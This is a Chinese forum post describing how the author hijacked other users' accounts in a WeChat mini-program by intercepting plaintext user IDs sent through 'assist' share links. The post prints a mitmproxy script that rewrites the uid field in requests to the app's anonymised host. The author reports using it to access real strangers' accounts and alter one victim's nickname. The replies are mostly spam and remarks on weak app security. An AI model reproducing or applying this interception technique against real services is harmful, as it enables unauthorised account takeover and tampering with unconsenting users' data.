某小程序通过助力链接盗号
本帖最后由 418 于 2024-11-4 19:43 编辑又是上一个小程序,开发出来挨打(不是)
是盗小程序的账号,不是微信号~
助力玩法如下
image-20241104134623869.png
转发到群里,别人点进去就算助力成功
image-20241104134709385.png
浅浅抓个包,发现助力的jid(用户凭证)明文传输
image-20241104123656763.png
于是用mitmproxy写了个脚本
```python
from mitmproxy import http
from multy_account.account import uid_list
def request(flow: http.HTTPFlow) -> None:
# pretty_host takes the "Host" header of the request into account,
# which is useful in transparent mode where we usually only have the IP
# otherwise.
if flow.request.pretty_host == "xxx.xxxxxx.com":
print(flow.request.url)
# print(flow.request.urlencoded_form['uid'])
if flow.request.urlencoded_form['uid']:
flow.request.urlencoded_form['uid'] = uid_list
```
再次刷新小程序,成功获取到别人的账号
随机修改一位幸运观众的昵称 :D
javascript:;
外包开发的吧或者是不注重安全的小公司 看不懂就问,这是干什么用的 qqpoly 发表于 2024-11-5 08:06
很多小程序都在这个水准上,问题是有时候,逼迫你必须处理,比如娃娃上学有关的,你工作相关的
环境换经济基本进入尾声,yinsi换经济正当时,大环境如此,非常难规范 看不懂就问,这是干什么用的 看不懂就问,这是干什么用的 看不懂就问,这是干什么用的 这世界本就是个草台班子 看不懂就问,这是干什么用的 坑人的东西太多太多太多了 这属于越权吧,没有鉴权呀直接uid登陆了吗
感谢楼主分享